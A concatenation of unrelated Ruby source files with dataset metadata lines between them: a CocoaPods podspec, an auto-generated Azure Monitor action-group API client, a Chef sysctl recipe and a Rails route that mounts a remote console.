Pod::Spec.new do |s| s.name = "SSApplication" s.version = "0.0.1" s.summary = "A UIApplication subclass to start your app off right." s.homepage = "https://github.com/splinesoft/SSApplication" s.license = { :type => 'MIT', :file => 'LICENSE' } s.author = { "Jonathan Hersh" => "[email protected]" } s.source = { :git => "https://github.com/splinesoft/SSApplication.git", :tag => s.version.to_s } s.platform = :ios, '6.0' s.requires_arc = true s.source_files = 'SSApplication/*.{h,m}' s.frameworks = 'UIKit' end
40.857143
104
0.589161
610cfdb13dd19634700d636f9b866ddc80f42671
32,487
# Code generated by Microsoft (R) AutoRest Code Generator. # Changes may cause incorrect behavior and will be lost if the code is # regenerated. module Azure::Monitor::Mgmt::V2018_03_01 # # Monitor Management Client # class ActionGroups include MsRestAzure # # Creates and initializes a new instance of the ActionGroups class. # @param client service class for accessing basic functionality. # def initialize(client) @client = client end # @return [MonitorManagementClient] reference to the MonitorManagementClient attr_reader :client # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def create_or_update(resource_group_name, action_group_name, action_group, custom_headers:nil) response = create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:custom_headers).value! response.body unless response.nil? end # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def create_or_update_with_http_info(resource_group_name, action_group_name, action_group, custom_headers:nil) create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:custom_headers).value! end # # Create a new action group or update an existing one. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group [ActionGroupResource] The action group to create or use # for the update. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def create_or_update_async(resource_group_name, action_group_name, action_group, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, 'action_group is nil' if action_group.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() request_content = @client.serialize(request_mapper, action_group) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:put, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 201 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end # Deserialize Response if status_code == 201 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def get(resource_group_name, action_group_name, custom_headers:nil) response = get_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def get_with_http_info(resource_group_name, action_group_name, custom_headers:nil) get_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! end # # Get an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def get_async(resource_group_name, action_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def delete(resource_group_name, action_group_name, custom_headers:nil) response = delete_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! nil end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def delete_with_http_info(resource_group_name, action_group_name, custom_headers:nil) delete_async(resource_group_name, action_group_name, custom_headers:custom_headers).value! end # # Delete an action group. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def delete_async(resource_group_name, action_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:delete, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 204 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupResource] operation results. # def update(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) response = update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:custom_headers).value! response.body unless response.nil? end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def update_with_http_info(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:custom_headers).value! end # # Updates an existing action group's tags. To update other fields use the # CreateOrUpdate method. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param action_group_patch [ActionGroupPatchBody] Parameters supplied to the # operation. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def update_async(resource_group_name, action_group_name, action_group_patch, custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? fail ArgumentError, 'action_group_patch is nil' if action_group_patch.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupPatchBody.mapper() request_content = @client.serialize(request_mapper, action_group_patch) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id,'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:patch, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupResource.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get a list of all action groups in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupList] operation results. # def list_by_subscription_id(custom_headers:nil) response = list_by_subscription_id_async(custom_headers:custom_headers).value! response.body unless response.nil? end # # Get a list of all action groups in a subscription. # # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_subscription_id_with_http_info(custom_headers:nil) list_by_subscription_id_async(custom_headers:custom_headers).value! end # # Get a list of all action groups in a subscription. # # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_subscription_id_async(custom_headers:nil) fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/providers/microsoft.insights/actionGroups' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Get a list of all action groups in a resource group. # # @param resource_group_name [String] The name of the resource group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [ActionGroupList] operation results. # def list_by_resource_group(resource_group_name, custom_headers:nil) response = list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! response.body unless response.nil? end # # Get a list of all action groups in a resource group. # # @param resource_group_name [String] The name of the resource group. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def list_by_resource_group_with_http_info(resource_group_name, custom_headers:nil) list_by_resource_group_async(resource_group_name, custom_headers:custom_headers).value! end # # Get a list of all action groups in a resource group. # # @param resource_group_name [String] The name of the resource group. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def list_by_resource_group_async(resource_group_name, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:get, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? # Deserialize Response if status_code == 200 begin parsed_response = response_content.to_s.empty? ? nil : JSON.load(response_content) result_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::ActionGroupList.mapper() result.body = @client.deserialize(result_mapper, parsed_response) rescue Exception => e fail MsRest::DeserializationError.new('Error occurred in deserializing the response', e.message, e.backtrace, result) end end result end promise.execute end # # Enable a receiver in an action group. This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # def enable_receiver(resource_group_name, action_group_name, enable_request, custom_headers:nil) response = enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:custom_headers).value! nil end # # Enable a receiver in an action group. This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param custom_headers [Hash{String => String}] A hash of custom headers that # will be added to the HTTP request. # # @return [MsRestAzure::AzureOperationResponse] HTTP response information. # def enable_receiver_with_http_info(resource_group_name, action_group_name, enable_request, custom_headers:nil) enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:custom_headers).value! end # # Enable a receiver in an action group. This changes the receiver's status from # Disabled to Enabled. This operation is only supported for Email or SMS # receivers. # # @param resource_group_name [String] The name of the resource group. # @param action_group_name [String] The name of the action group. # @param enable_request [EnableRequest] The receiver to re-enable. # @param [Hash{String => String}] A hash of custom headers that will be added # to the HTTP request. # # @return [Concurrent::Promise] Promise object which holds the HTTP response. # def enable_receiver_async(resource_group_name, action_group_name, enable_request, custom_headers:nil) fail ArgumentError, 'resource_group_name is nil' if resource_group_name.nil? fail ArgumentError, 'action_group_name is nil' if action_group_name.nil? fail ArgumentError, 'enable_request is nil' if enable_request.nil? fail ArgumentError, '@client.subscription_id is nil' if @client.subscription_id.nil? fail ArgumentError, '@client.api_version is nil' if @client.api_version.nil? request_headers = {} request_headers['Content-Type'] = 'application/json; charset=utf-8' # Set Headers request_headers['x-ms-client-request-id'] = SecureRandom.uuid request_headers['accept-language'] = @client.accept_language unless @client.accept_language.nil? # Serialize Request request_mapper = Azure::Monitor::Mgmt::V2018_03_01::Models::EnableRequest.mapper() request_content = @client.serialize(request_mapper, enable_request) request_content = request_content != nil ? JSON.generate(request_content, quirks_mode: true) : nil path_template = 'subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/microsoft.insights/actionGroups/{actionGroupName}/subscribe' request_url = @base_url || @client.base_url options = { middlewares: [[MsRest::RetryPolicyMiddleware, times: 3, retry: 0.02], [:cookie_jar]], path_params: {'resourceGroupName' => resource_group_name,'actionGroupName' => action_group_name,'subscriptionId' => @client.subscription_id}, query_params: {'api-version' => @client.api_version}, body: request_content, headers: request_headers.merge(custom_headers || {}), base_url: request_url } promise = @client.make_request_async(:post, path_template, options) promise = promise.then do |result| http_response = result.response status_code = http_response.status response_content = http_response.body unless status_code == 200 || status_code == 409 error_model = JSON.load(response_content) fail MsRest::HttpOperationError.new(result.request, http_response, error_model) end result.request_id = http_response['x-ms-request-id'] unless http_response['x-ms-request-id'].nil? result.correlation_request_id = http_response['x-ms-correlation-request-id'] unless http_response['x-ms-correlation-request-id'].nil? result.client_request_id = http_response['x-ms-client-request-id'] unless http_response['x-ms-client-request-id'].nil? result end promise.execute end end end
45.950495
159
0.70502
1a1828405dd8bd43dde09fbc6945be2b9fc8980a
1,063
# # Cookbook Name:: sysctl # Recipe:: default # # Copyright 2011, Fewbytes Technologies LTD # Copyright 2012, Chris Roberts <[email protected]> # Copyright 2013-2014, OneHealth Solutions, Inc. # include_recipe 'sysctl::service' if node['sysctl']['conf_dir'] directory node['sysctl']['conf_dir'] do owner 'root' group 'root' mode 0755 action :create end end if Sysctl.config_file(node) # this is called by the sysctl_param lwrp to trigger template creation ruby_block 'save-sysctl-params' do action :nothing block do end notifies :create, "template[#{Sysctl.config_file(node)}]", :delayed end # this needs to have an action in case node.sysctl.params has changed # and also needs to be called for persistence on lwrp changes via the # ruby_block template Sysctl.config_file(node) do action :create source 'sysctl.conf.erb' mode '0644' notifies :start, 'service[procps]', :immediately only_if do node['sysctl']['params'] && !node['sysctl']['params'].empty? end end end
24.72093
72
0.697084
bb7f41b11e8a0e83893cc019652d05d7bc565972
296
Vmdb::Application.routes.draw do if Rails.env.development? && ENV['MOUNT_REMOTE_CONSOLE_PROXY'] logger = Logger.new(STDOUT) logger.level = Logger.const_get(::Settings.log.level_remote_console.upcase) mount RemoteConsole::RackServer.new(:logger => logger) => '/ws/console' end end
37
79
0.739865